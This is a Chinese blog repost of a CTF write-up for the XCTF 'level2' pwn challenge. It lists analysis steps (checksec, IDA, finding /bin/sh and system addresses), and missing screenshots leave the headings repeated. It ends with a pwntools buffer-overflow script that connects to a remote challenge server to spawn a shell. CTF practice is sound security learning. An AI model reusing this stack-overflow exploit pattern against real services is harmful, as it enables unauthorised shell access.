您的位置: 首页 > IT文章 > 攻防世界—pwn—level2 题目分析信息收集编写脚本

攻防世界—pwn—level2 题目分析信息收集编写脚本

分类: IT文章 • 2022-07-30 16:35:31

题目提示

攻防世界—pwn—level2
题目分析
信息收集
编写脚本

下载文件后首先使用checksec检查文件保护机制

攻防世界—pwn—level2
题目分析
信息收集
编写脚本

使用ida打开，查看伪代码

攻防世界—pwn—level2
题目分析
信息收集
编写脚本

搜索字符串发现/bash/sh

攻防世界—pwn—level2
题目分析
信息收集
编写脚本

信息收集

偏移量

攻防世界—pwn—level2
题目分析
信息收集
编写脚本

system的地址

攻防世界—pwn—level2
题目分析
信息收集
编写脚本

/bin/sh的地址

攻防世界—pwn—level2
题目分析
信息收集
编写脚本

编写脚本

from pwn import *
p = remote('111.198.29.45',50136)
#p = process("./pwn003")
binsh = 0x0804A024
system = 0x8048320
payload = "A"*0x88+"B"*0x4+p32(system)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()

本地测试

攻防世界—pwn—level2
题目分析
信息收集
编写脚本

靶机测试

攻防世界—pwn—level2
题目分析
信息收集
编写脚本

攻防世界—pwn—level2 题目分析 信息收集 编写脚本

题目提示

下载文件后首先使用checksec检查文件保护机制

使用ida打开，查看伪代码

搜索字符串发现/bash/sh

信息收集

偏移量

system的地址

/bin/sh的地址

编写脚本

本地测试

靶机测试

相关推荐

攻防世界—pwn—level2 题目分析信息收集编写脚本